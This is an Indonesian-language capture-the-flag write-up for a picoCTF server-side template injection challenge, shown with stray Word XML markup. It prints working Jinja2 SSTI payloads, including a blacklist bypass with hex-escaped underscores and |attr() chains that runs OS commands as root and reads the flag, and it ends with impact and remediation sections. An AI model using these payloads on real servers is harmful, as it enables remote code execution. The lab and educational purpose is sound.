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Write UP CTF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Identitas Challenge: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Kategori : Web Exploitation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Nama Challenge : SSTI 2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Level : Medium</w:t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Deskripsi Challenge:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009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Pada challenge kali ini peserta di minta untuk exploit sebuah website yang di sediakan. Tujuan challenge ini adalah untuk mengeksploit menggunakan Server Side Template Injection (SSTI) dan mendapatkan flagnya.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Tahap Analisis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000C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Langkah awal adalah melihat apa saja yang tidak di blacklist:</w:t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#1 coba ketikan perintah berikut : {{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}},jika hasilnya : Stop trying to break me &gt;:( maka kemungkinan tanda “.” yang di blacklist.</w:t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#2 coba terus sampai mendapatkan yang sesuai misalnya perintah: {{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}, hasilnya : uid=0(root) gid=0(root) groups=0(root) maka perintah tersebut tidak di blacklist</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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Tahap Penyelesaian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0.1 Setelah di temukan perintah yang sesuai, lalu cari flag nya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0.2 ubah perintah ‘id’ yang di temukan dalam perintah sebelumnya menjadi ‘cat flag’  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0.3 Jika sudah sesuai, jalankan untuk dapatkan flagnya.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Hasil Flag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picoCTF{sst1_f1lt3r_byp4ss_4de30aa0}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Dampak Keamanan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ind w:left="720" w:firstLine="0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Remote Code Execution (RCE): Dampak paling kritis, di mana penyerang dapat mengeksekusi perintah sistem operasi secara </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="0a0a0a"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">arbitrer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 pada server. Ini memberikan kontrol penuh kepada penyerang atas server yang rentan.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jc w:val="both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Rekomendasi Perbaikan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ind w:left="72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1. Validasi dan Sanitasi Input: Terapkan validasi input yang ketat. Tolak atau bersihkan input yang mengandung karakter khusus yang digunakan dalam sintaks mesin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template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(seperti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{{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}}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${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%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ind w:left="720" w:firstLine="0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ind w:left="720" w:firstLine="0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Arbitrer" dalam SSTI adalah kemampuan penyerang untuk membuat server melakukan perintah apa saja yang mereka inginkan, menjadikannya salah satu kerentanan web paling kritis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